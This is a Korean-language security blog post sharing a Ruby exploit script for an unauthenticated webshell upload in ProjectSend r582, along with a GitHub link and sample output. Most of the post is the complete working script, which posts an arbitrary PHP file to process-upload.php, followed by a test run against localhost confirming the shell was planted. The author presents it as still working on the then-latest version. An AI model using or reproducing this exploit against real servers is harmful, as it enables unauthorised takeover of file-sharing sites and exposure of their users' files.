| | at : |
Archive

[WEB HACKING] ProjectSend R582 WebShell 취약점(Exploit) [ZERODAY?] 하훌 rwxr-xr-x 0 7/07/2015



[WEB HACKING] ProjectSend R582 WebShell 취약점(Exploit) [ZERODAY?]

Permission rw-r--r--
Author 하훌
Date and Time 7/07/2015
Label
License 크리에이티브 커먼즈 라이선스


최근 ProjectSend 라는 프레임워크에 대해 분석하던 중 Webshell 업로드가 가능한 취약점을 찾아 Exploit-db에 업로드하였으나..
알고보니 기존에 올라왔던 취약점이였습니다 =_= .. 그저 기쁜마음에 스크립트부터 작성하여 넘겼지만 찾아볼 생각을 하지 않았었네요..

그래도 간단하게 ruby 언어로 짜서 사용가능하기에 블로그 통해 공유드릴까합니다.

현재 최신버전인 r582에서도 동작하는 제로데이네요.

GIT Repo

https://github.com/hahwul/ProjectSend_r582_webshell.git
 + https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/ProjectSend_r582_webshell.rb
 + https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/README.md
# git clone https://github.com/hahwul/ProjectSend_r582_webshell.git


Source Code

ProjectSend_r582_webshell.rb
# --------------------------------------------------------------------
# Exploit Title: ProjectSend-r582 WebShell Upload(non-auth)
# Date: 2015-07-01
# Exploit Author: hahwul
# Blog: http://www.codeblack.net
# Vendor Homepage: http://www.projectsend.org
# Software Link: http://www.projectsend.org/download/108/
# Version: ProjectSend-r582
# Tested on: debian [wheezy]
# CVE : none
# --------------------------------------------------------------------

require "net/http"
require "uri"
require "net/http/post/multipart"

if ARGV.length != 2

puts "ProjectSend r582ver Webshell Upload"
puts "Usage: ruby ProjectSend_r582_webshell.rb [targetURL] [ShellFile]"
puts "  targetURL(ex): http://127.0.0.1/vul_test/ps"
puts "  ShellFile(ex): MyShell.php"
puts "  Example : ~~.rb http://127.0.0.1/vul_test/ps MyShell.php"
puts "  Include Gem : gem install multipart-post"
puts "  exploit & code by hahwul[www.codeblack.net]"

else

target_url = ARGV[0]    # http://127.0.0.1/ps/
shell_name = ARGV[1]    # myshell.php
exp_url = target_url + "/process-upload.php"

uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)

multipartParams = {"file" => UploadIO.new(File.new(shell_name), "application/octet-stream", "shell.php")}
multipartParams = multipartParams.merge({"name"=>"shell.php"})
request = Net::HTTP::Post::Multipart.new(uri.request_uri, multipartParams)
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
request["Cache-Control"] = "no-cache"
request["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0"
request["Connection"] = "keep-alive"
request["Accept-Language"] = "ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3"
request["Accept-Encoding"] = "gzip, deflate"
request["Pragma"] = "no-cache"
response = http.request(request)

puts "Target: "+uri.host+uri.path
puts "Exploit..."
puts "Status code: "+response.code
puts "Open WebShell Page :: "+target_url+"/upload/files/"+shell_name

end


Execute & Result 

# ruby ProjectSend_r582_webshell.rb http://127.0.0.1/vul_test/ps shell.php
Target: 127.0.0.1/vul_test/ps/process-upload.php
Exploit...
Status code: 302
Open WebShell Page :: http://127.0.0.1/vul_test/ps/upload/files/shell.php

Open Upload URL : http://127.0.0.1/vul_test/ProjectSend/upload/files/shell.php
WEBSHELL UPLOAD
total 12 drwxrwxrwx 2 hahwul hahwul 4096 Jul 1 01:21 . drwxrwxrwx 4 hahwul hahwul 4096 Jul 1 01:11 .. -rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php -rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php

Share







HAHWUL
HACKING | PENETRATION-TEST | CODING
HACKERONE : GIT : 0DAY-TODAY : EXPLOIT-DB : PACKETSTORM
GOOGLE+ | HAHWUL@GMAIL.COM | TWITTER
WWW.HAHWUL.COM




0 개의 댓글:

댓글 쓰기